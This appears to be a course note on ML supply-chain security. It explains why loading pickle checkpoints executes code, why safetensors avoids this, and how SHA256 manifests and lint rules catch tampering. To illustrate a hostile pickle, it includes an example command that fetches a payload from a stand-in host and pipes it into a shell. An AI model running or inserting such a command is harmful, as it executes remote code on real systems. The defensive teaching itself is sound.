02 — Supply chain: pickle, safetensors, MANIFEST.json

Summary: the supply chain is everything we load from disk: model weights, tokenizer, RAG indexes. pickle is a serialized program, not a data format: torch.load(untrusted_path) executes arbitrary code by design. The alternative is safetensors (data only, no code) plus a MANIFEST.json with a SHA256 per artifact, verified by scripts/verify_artifacts.sh before any load.


What "supply chain" means for this system

Every persisted artifact loaded at runtime is part of the supply chain:

Artifact | Path (per phases 11–32) | Risk class
--- | --- | ---
Tokenizer (BPE merges + vocab) | artifacts/tokenizer/ | Medium (JSON; integrity-only)
Model weights | artifacts/checkpoints/mini-gpt-grammar.{pt,safetensors} | High (deserialization)
RAG embeddings index | artifacts/rag/index/ | Medium (binary; integrity-only)
RAG knowledge-base chunks | data/kb/grammar-rules/chunks.jsonl | Medium (JSON; content-integrity)
Hypothesis fuzz corpus | .hypothesis/ | Low (test-time only)

The supply-chain question is: if I trust nothing about who put these files on disk, what can go wrong?

Pickle: the worst-case load

Python's pickle module is not a data format; it's a serialized program. When you call pickle.load(f), the pickle VM walks a sequence of opcodes that can:

  • Allocate objects.
  • Call arbitrary callables (including os.system, subprocess.run, eval).
  • Import arbitrary modules.

A pickle byte sequence that calls os.system("curl evil.com/payload | sh") during deserialization is trivial to construct. There is no flag to "load data only" — that's not what pickle does.
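To make the "serialized program" point concrete, here is a minimal, deliberately harmless sketch. The `Payload` class is hypothetical and exists only for this illustration; it swaps the dangerous callable for `os.getpid`, so nothing destructive runs. It relies on the standard `__reduce__` hook, which lets an object tell pickle which callable to invoke at load time.

```python
import os
import pickle
import pickletools


class Payload:
    """Hypothetical stand-in for a hostile object; the callable is harmless."""

    def __reduce__(self):
        # Tells pickle: "to rebuild me, call os.getpid() with no arguments".
        # A real attacker would return (os.system, ("<shell command>",)) instead.
        return (os.getpid, ())


blob = pickle.dumps(Payload())

# Loading never constructs a Payload; it calls os.getpid() and returns the result.
result = pickle.loads(blob)

# The opcode stream contains REDUCE, the "call this callable" instruction.
opcodes = [opcode.name for opcode, _arg, _pos in pickletools.genops(blob)]
```

After this runs, `result` is the current process ID rather than a `Payload` instance, and `opcodes` includes `REDUCE`. The same mechanism that called `os.getpid` here would call any other importable callable the file names.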

torch.load wraps pickle. PyTorch 2.6 changed the default to weights_only=True, which restricts the unpickler, but older versions and any call that passes weights_only=False still run the full pickle VM. So:

import torch
# Hostile checkpoint downloaded from a model hub:
state = torch.load("downloaded.pt", weights_only=False)  # ← arbitrary code executes here
model.load_state_dict(state)            # ← reached only if RCE didn't drop a shell

The chance of RCE on an unrestricted torch.load(untrusted_path) is 100% if the file is hostile. Not "it depends on the model architecture." Not "if you have weird tensors." A hostile file is defined as one that runs code on load; the file format permits it; the loader honors it.

What "untrusted path" means

The path is untrusted if any of the following hold:

  • The file was downloaded from a public hub (Hugging Face, Civitai, a random GitHub release).
  • The file was emailed, dropped into a shared drive, or attached to a PR.
  • The file is on a host another user can write to without your review.
  • The file was downloaded a year ago; you don't remember verifying it.

Trust is a property of provenance and integrity, not of the act of having the file on disk.

Safetensors: data only, no code

safetensors is a format designed specifically to be safe to deserialize:

  • The file starts with an 8-byte little-endian header length, followed by a JSON header: tensor name → {dtype, shape, data_offsets}.
  • The body is raw bytes for each tensor, in the declared dtype/shape.
  • The loader never instantiates Python objects beyond plain tensors.

There is no opcode, no callable, no import, no __reduce__. The loader reads bytes into a tensor. End of trust boundary.

from safetensors.torch import load_file
state = load_file("downloaded.safetensors")   # just tensors, no code path to RCE
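The layout described above is simple enough to parse with the standard library alone, which is a useful way to see that there is nothing to execute. The sketch below assumes the published safetensors layout (an 8-byte little-endian header length, a UTF-8 JSON header, then raw tensor bytes); `read_header` and the tensor name `w` are hypothetical names for this illustration, not part of the safetensors API.

```python
import json
import struct


def read_header(raw: bytes) -> dict:
    """Parse only the JSON header of a safetensors byte string."""
    (header_len,) = struct.unpack("<Q", raw[:8])
    return json.loads(raw[8 : 8 + header_len].decode("utf-8"))


# Build a one-tensor file in memory: two little-endian float32 values named "w".
header = {"w": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]}}
header_bytes = json.dumps(header).encode("utf-8")
body = struct.pack("<2f", 1.0, 2.0)
raw = struct.pack("<Q", len(header_bytes)) + header_bytes + body

# Reading it back is JSON parsing plus byte slicing; offsets are relative
# to the start of the data section that follows the header.
parsed = read_header(raw)
begin, end = parsed["w"]["data_offsets"]
data_start = 8 + len(header_bytes)
values = struct.unpack("<2f", raw[data_start + begin : data_start + end])
```

Every step is a length read, a JSON parse, or a slice. In practice you would still use `safetensors.torch.load_file`, which also validates the header; this sketch only shows why the format has no code path to abuse.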

A hostile .safetensors file can still lie about its contents: wrong shape, wrong values, NaN-poisoned weights that degrade quality. That is an integrity attack, not an RCE, and it is caught downstream by:

  • Shape checks at load_state_dict.
  • MANIFEST.json SHA256 verification (below).
  • Behavioral tests after load (Phase 20's harness will flag a degraded model).

Trade-off: safetensors gives up the convenience of "pickle anything Python can pickle" and gains a hard guarantee against RCE-on-load.

MANIFEST.json: integrity for everything else

Even with safetensors, you still need to know: is this file the one I expect, or was it swapped?

Phase 18 emits MANIFEST.json at the end of each training run:

{
  "generated_at": "2026-05-22T14:31:08Z",
  "git_sha": "a1b2c3d…",
  "artifacts": [
    {
      "path": "artifacts/checkpoints/mini-gpt-grammar.safetensors",
      "sha256": "8f2a…cc91",
      "bytes": 4194304,
      "role": "model-weights"
    },
    {
      "path": "artifacts/tokenizer/vocab.json",
      "sha256": "1d3c…0a87",
      "bytes": 16384,
      "role": "tokenizer-vocab"
    },
    {
      "path": "data/kb/grammar-rules/chunks.jsonl",
      "sha256": "4e7b…b21f",
      "bytes": 102400,
      "role": "rag-kb"
    }
  ]
}
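A manifest with this shape could be produced along the following lines. This is a sketch under assumptions, not Phase 18's actual code: `build_manifest`, `sha256_of`, and the `roles` mapping are hypothetical names, and the caller is assumed to supply the git SHA.

```python
import hashlib
from datetime import datetime, timezone
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large checkpoints do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path, roles: dict[str, str], git_sha: str) -> dict:
    """Build a manifest dict; `roles` maps a path relative to `root` to its role."""
    artifacts = []
    for rel_path, role in roles.items():
        file_path = root / rel_path
        artifacts.append(
            {
                "path": rel_path,
                "sha256": sha256_of(file_path),
                "bytes": file_path.stat().st_size,
                "role": role,
            }
        )
    return {
        "generated_at": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "git_sha": git_sha,
        "artifacts": artifacts,
    }
```

The returned dict can be written out with `json.dumps(manifest, indent=2)`. Recording the byte count alongside the hash is redundant for integrity, but it makes a truncated file easy to spot at a glance.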

scripts/verify_artifacts.sh (Lab 04):

  1. Walks artifacts[].
  2. For each entry: computes sha256sum <path>.
  3. Compares to the stored sha256.
  4. Exits 0 if all match. Exits non-zero with a clear message naming the mismatched file.
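The four steps above can be sketched in Python as follows. The real check is the shell script from Lab 04; this is only an equivalent illustration, and `verify_manifest`, `file_sha256`, and `main` are hypothetical names. A missing file is treated as a mismatch, which is an assumption about the desired behavior.

```python
import hashlib
import json
import sys
from pathlib import Path


def file_sha256(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large checkpoints do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(manifest_path: Path, root: Path) -> list[str]:
    """Return the paths that are missing or whose hash differs; empty means all match."""
    manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
    failures = []
    for entry in manifest["artifacts"]:
        target = root / entry["path"]
        if not target.is_file() or file_sha256(target) != entry["sha256"]:
            failures.append(entry["path"])
    return failures


def main(manifest: str = "MANIFEST.json", root: str = ".") -> int:
    """Print each mismatched file to stderr and return a shell-style exit code."""
    failures = verify_manifest(Path(manifest), Path(root))
    for path in failures:
        print(f"MISMATCH: {path}", file=sys.stderr)
    return 1 if failures else 0
```

A loader would call `sys.exit(main())` before touching any artifact, so that a non-zero exit stops the load. Collecting every failure instead of stopping at the first one means a single run names all the files that need attention.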

This catches:

  • Bit rot on disk.
  • An attacker swapping chunks.jsonl for a poisoned version.
  • A teammate accidentally overwriting weights with an older checkpoint.

It does not catch:

  • An attacker who also rewrites MANIFEST.json. (Mitigation: GPG-sign MANIFEST.json, store the public key out-of-band. Phase 37's lab leaves signing as a stretch goal.)
  • Logic bugs in the artifacts. (Mitigation: behavioral tests, Phase 20.)

The manifest is a tripwire, not a fortress. But it's a cheap tripwire that catches the common cases (rot, accidental overwrite, naive tampering).

The threat in numbers

A quick sanity check, not a measurement:

  • Probability that a random hub checkpoint is hostile: low but non-zero. Documented cases exist (the PoisonGPT weight-tampering demonstration, publicly reported scanner findings of malicious pickle payloads on HF in 2023–2024).
  • Severity if a hostile checkpoint runs: 5/5 (full RCE on the host as the user running the load).
  • Detection probability without tooling: ~0% (nothing visible during load).
  • Detection probability with MANIFEST.json + safetensors-only policy: high for naive tampering, moderate for sophisticated tampering (the attacker would need to compromise the file, the manifest, and, if the manifest is signed, the signing key).

Residual risk after the policy: low for this single-user, local-only deployment. Higher for any multi-user deployment, which Phase 37 explicitly does not cover.
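To see how these estimates combine, here is a small sketch using the prob × severity × (1 − detection) product that the next note builds into a matrix. Only the severity of 5 and the ~0% detection without tooling come from the list above; the probability and the detection rate under the policy are hypothetical placeholders, not measurements.

```python
def risk_score(probability: float, severity: int, detection: float) -> float:
    """prob × severity × (1 − detection); a higher score means more residual risk."""
    return probability * severity * (1.0 - detection)


# Hypothetical placeholder: "low but non-zero" chance that a hub checkpoint is hostile.
P_HOSTILE = 0.01
# From the list above: full RCE on the host.
SEVERITY = 5

# ~0% detection without tooling (from the list above).
without_tooling = risk_score(P_HOSTILE, SEVERITY, detection=0.0)

# Hypothetical placeholder: 90% detection with MANIFEST.json + safetensors-only policy.
with_policy = risk_score(P_HOSTILE, SEVERITY, detection=0.9)
```

With these placeholder inputs the score falls by about a factor of ten. The absolute numbers mean little; the point is that raising detection is the lever the policy pulls.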

The enforcement: bandit + custom rule

The policy "no pickle-based loads in agent code" is enforced two ways:

  1. bandit rule B301: flags pickle.load and friends in src/.
  2. Custom rule: flags torch.load( without an explicit weights_only=True argument. (Even with weights_only=True, prefer safetensors; the flag is defense in depth, not the primary defense.)

just security runs both as part of CI. A new use of pickle requires a per-line # nosec with a justification comment, code review, and an entry in security/THREATS.md.
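The custom rule could be implemented in several ways; the source does not say which. One possible sketch uses the standard `ast` module, with `find_unsafe_torch_loads` as a hypothetical name. It only recognizes the literal spelling `torch.load(...)`, so aliased imports such as `from torch import load` would slip past it.

```python
import ast


def find_unsafe_torch_loads(source: str) -> list[int]:
    """Return line numbers of torch.load(...) calls lacking a literal weights_only=True."""
    flagged = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_torch_load = (
            isinstance(func, ast.Attribute)
            and func.attr == "load"
            and isinstance(func.value, ast.Name)
            and func.value.id == "torch"
        )
        if not is_torch_load:
            continue
        # Only the literal keyword weights_only=True counts as safe;
        # a variable or a missing keyword is flagged.
        has_safe_flag = any(
            kw.arg == "weights_only"
            and isinstance(kw.value, ast.Constant)
            and kw.value.value is True
            for kw in node.keywords
        )
        if not has_safe_flag:
            flagged.append(node.lineno)
    return sorted(flagged)
```

Requiring a literal `True` is a deliberately strict choice: a value computed at runtime cannot be checked statically, so the rule treats it as unsafe and leaves the justification to code review.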

One-paragraph recap

The model-load path is the single highest-severity supply-chain risk in any ML system: torch.load on an untrusted pickle is RCE by design. The fix is two-layered: switch to safetensors (no code path to execute) and verify everything against MANIFEST.json SHA256 hashes (catch tampering and rot). Enforcement is via bandit + a custom rule, with scripts/verify_artifacts.sh as the runtime tripwire.

Next: theory/03-threat-modeling-numbers.md — the prob × severity × (1 − detection) matrix.